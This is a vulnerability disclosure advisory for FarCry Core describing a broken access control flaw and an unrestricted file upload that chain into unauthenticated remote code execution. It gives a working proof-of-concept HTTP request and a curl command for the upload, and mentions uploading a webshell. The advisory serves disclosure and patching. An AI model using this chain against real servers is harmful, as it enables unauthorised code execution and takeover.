Introduction

During an engagement, David Sunley, Jim Rush, Jack Moran, and Michael Tsai discovered two critical vulnerabilities in FarCry Core, an open-source web application framework designed to be used with ColdFusion. Due to a broken access control issue, unauthenticated users can access sensitive functionality and data, including unrestricted file upload functionality. Chaining these issues together, an attacker could write arbitrary files to disk and perform remote code execution on the underlying web server from an unauthenticated perspective (in FarCry’s default configuration).

Vulnerability Discovery

Broken Access Control

The /farcry/core/webtop/Application.cfc file contains the following method to check whether a user making a request to any file or directory inside of the /webtop directory is authorised to do so:

<cfimport taglib="/farcry/core/tags/security" prefix="sec" />		

<cfif not findNoCase( "login.cfm", cgi.script_name )>  
  <!--- If the user is not logged in, then they are redirected to the login page with no message --->
  <sec:checkLoggedIn url="#arguments.targetPage#?#cgi.query_string#" />  

  <!--- If the user is logged in but does not have the admin permission, then they are redirected with a message --->
  <sec:checkLoggedIn url="#arguments.targetPage#?#cgi.query_string#" lPermissions="admin" message="You do not have permission to access the webtop" />  
</cfif>

However, inside of the /webtop directory is a /facade directory that contains its own Application.cfc file:

<cfcomponent extends="farcry.core.proxyApplication" displayname="Application" output="true" hint="Handle the application.">

</cfcomponent>

Since this file is essentially empty, the webtop security check that is expected to happen on any request to /webtop is effectively removed, allowing any unauthorised user to access files within /facade.

Unrestricted file upload

Within /facade is the /fileupload/upload.cfm file. This file does what it says on the tin, and is designed to be run as part of a form a developer has created. This file can be directly accessed through the browser, however. Due to the verbose nature of FarCry’s error messages that indicate exactly which URL parameters the upload.cfm file is expecting (typename, property, fieldname, and current), an HTTP request can be incrementally constructed that performs a valid file upload to whichever destination directory is declared in the request. The following screenshot shows the upload.cfm page and its verbose error messages:

Screenshot of verbose FarCry error messages.

Furthermore, despite file upload allowlists being defined in several places throughout FarCry, none are applied to /fileupload/upload.cfm. The following screenshot shows a ColdFusion webshell (shell.cfm) being successfully uploaded to the /files/dmfile directory:

Screenshot of ColdFusion web shell upload.

Navigate to /files/dmfile/shell.cfm, et voilà.

PoC

The following is an example request that uploads a simple text file (poc.txt) to the /files/dmfile/ directory:

POST /farcry/core/webtop/facade/fileupload/upload.cfm?typename=dmFile&property=filename&fieldname=form-data&current= HTTP/1.1
Host: host
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIo7Vi06BQG9DDtyq
Connection: close
Content-Length: 301

------WebKitFormBoundaryIo7Vi06BQG9DDtyq
Content-Disposition: form-data; name="filedata"; filename="txt"
Content-Type: text/html

Reproduction proof-of-concept.

------WebKitFormBoundaryIo7Vi06BQG9DDtyq
Content-Disposition: form-data; name="filename"

poc.txt
------WebKitFormBoundaryIo7Vi06BQG9DDtyq--

Alternatively, the following cURL command can be used to perform the same file upload:

curl -i -s -k -X $'POST' \
    -H $'Host: host' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIo7Vi06BQG9DDtyq' -H $'Connection: close' -H $'Content-Length: 301' \
    --data-binary $'------WebKitFormBoundaryIo7Vi06BQG9DDtyq\x0d\x0aContent-Disposition: form-data; name=\"filedata\"; filename=\"txt\"\x0d\x0aContent-Type: text/html\x0d\x0a\x0d\x0aReproduction proof-of-concept.\x0d\x0a\x0d\x0a------WebKitFormBoundaryIo7Vi06BQG9DDtyq\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0apoc.txt\x0d\x0a------WebKitFormBoundaryIo7Vi06BQG9DDtyq--' \
    $'https://host/farcry/core/webtop/facade/fileupload/upload.cfm?typename=dmFile&property=filename&fieldname=form-data&current='

Potential Impact

Unauthenticated remote code execution.

How To Fix

Upgrade to the latest version of FarCry Core (7.2.14):

Acknowledgements

Thanks again to Jim, Jack, and Michael for their collaboration on this <3

Vulnerability Disclosure Timeline

  • 18/10/2023 - Issues disclosed to vendor
  • 18/10/2023 - Vendor response
  • 27/10/2023 - Bugs patched by vendor, master branch is up to date
  • 28/10/2023 - Asked vendor when packaged release will be rolled out, no response
  • 14/11/2023 - Requesting update from vendor
  • 14/11/2023 - Vendor responds, packaged release happening soon
  • 20/03/2024 - Requesting update from vendor, no response
  • 01/05/2024 - Contacted vendor to indicate that the vulnerabilities will be publicly disclosed since the FarCry Core master branch is up to date, despite no packaged releases
  • 02/05/2024 - Vendor responds, limited bandwidth for packaged release process
  • 29/05/2024 - CVEs assigned - CVE-2024-35526 (broken access control), CVE-2024-35527 (unrestricted file upload)
  • 31/05/2024 - Advisory published

Latest event

BSides San Francisco

to

CityView at SF Metreon

BSides San Francisco is a non-profit organization designed to advance the body of Information Security knowledge by providing an annual, two-day, open forum for discussion and debate for security engineers and their affiliates. Presenters at BSides SF conferences are engaging the participants and getting the discussions started on the “Next Big Thing”, not preaching at you from the podium about last month’s news.

See all events
Contact us

Take the next step and talk to us today.

Let's get started